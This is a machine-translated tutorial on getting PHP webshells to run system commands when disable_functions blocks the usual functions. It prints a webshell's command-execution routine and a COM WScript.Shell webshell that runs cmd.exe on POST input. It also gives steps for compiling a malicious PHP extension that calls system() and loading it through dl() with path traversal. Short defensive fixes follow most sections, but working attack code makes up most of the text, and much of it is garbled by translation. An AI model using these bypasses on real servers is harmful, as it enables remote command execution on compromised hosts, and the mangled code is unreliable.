Webshell Command Execution restrictions and bypass Methods

0 × 00Preface

After uploading the webshell, you may not be able to execute the command. In this case, we should analyze the principle and come up with a way to bypass it. The defender must also think about a stronger defense based on the bypass method.

0 × 01 php webshellCommand Execution Principle

How does php webshell execute system commands? Let's look for a webshell analysis.

Search for keywords and locate the following code:

function execute($cfe) {       $res = '';       if ($cfe) {              if(function_exists('system')) {                     @ob_start();                     @system($cfe);                     $res = @ob_get_contents();                     @ob_end_clean();              } elseif(function_exists('passthru')) {                     @ob_start();                     @passthru($cfe);                     $res = @ob_get_contents();                     @ob_end_clean();              } elseif(function_exists('shell_exec')) {                     $res = @shell_exec($cfe);              } elseif(function_exists('exec')) {                     @exec($cfe,$res);                     $res = join("\n",$res);              } elseif(@is_resource($f = @popen($cfe,"r"))) {                     $res = '';                     while(!@feof($f)) {                            $res .= @fread($f,1024);                     }                     @pclose($f);              }       }       return $res;}

That is, when the system (), passthru (), shell_exec, exec, and popen functions are successfully called, they will not be called further.

 

0 × 02Disable webshellCommand Execution Principle

The Php configuration file contains a disable_functions = configuration, which disables some php functions,

The server uses this to prohibit php from executing command functions,

For example

disable_functions =system,passthru,shell_exec,exec,popen

You cannot use these functions to execute system commands.

 

0 × 03Blacklist Bypass

After understanding the principle, we can come up with a lot of ways to bypass

First, blacklist Bypass

Let's look at the functions that can execute system commands in php.

Assert, system, passthru, exec, pcntl_exec, shell_exec, popen, proc_open ,''(Unquoted)

Then you can see which functions have been missed by the disable_function in php. ini.

Then hack it.

When conducting a penetration test on a large enterprise, assert is not disabled and commands are successfully executed.

The case on wooyun has not disabled proc_open.

Http://www.wooyun.org/bugs/wooyun-2013-015991

Solution: Pay attention to and collect php system command execution functions and complete disable_function items.

 

0 × 04System component Bypass

This method applies to windows

View code

<? Php $ command = $ _ POST [a]; $ wsh = new COM ('wscript. shell '); // generate a COM Object $ exec = $ wsh-> exec('cmd.exe/C '. $ command); // call the object method to execute the command $ stdout = $ exec-> StdOut (); $ stroutput = $ stdout-> ReadAll (); echo $ stroutput?>

Shell. Application can achieve the same effect.

The complete solution is to directly Delete the wshom. ocx file in the System32 directory.

 

0 × 05Extended library Bypass

In Linux, attackers can bypass the compilation extension library.

Errors are prompted for methods on the network and official methods,

After research, a correct PHP extension library compilation method is provided.

High energy ahead.

First, we know the PHP version of the php server and download a php source code package of the same or similar version.

Tar zxvf php-5.3.10.tar.gz // decompress cd php-5.3.10/ext./ext_skel -- extname = dl // generate an extended library named dl cd dlvi config. m4

Set the three rows

PHP_ARG_WITH(dl, for dl support,Make sure that the comment is aligned:[  --with-dl             Include dl support])

Remove and save the previous dnl

Whereis phpize // find the phpize path/usr/local/bin/phpize // run phpizevi dl. c

In

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &arg, &arg_len) == FAILURE) {                return;        }

Add under this line

System (arg); whereis php-config // find the path of php-config./configure -- whith-php-config = php-config path makemake install [root @ TENCENT64 ~ /Php-5.3.10/ext/dl] # make installInstalling shared extensions:/usr/local/lib/php/extensions/no-debug-non-zts-20121212/

Successfully generated

 

View

Extension_dir

Set

/usr/local/lib/php/extensions/no-debug-non-zts-20121212/dl.so

Copy to extension_dir directory

If the extension_dir directory does not have the write permission, you can write it to any directory and use the ../to bypass and call it.

Code:

<? Phpdl ("dl. so "); // dl. so is in the extension_dir directory. If not, it is used .. /.. /To Call confirm_dl_compiled ("$ _ GET [a]> 1.txt");?>

The command execution result is displayed in cmd1.txt. 

Defense method: add the dl function to disable_function to disable it.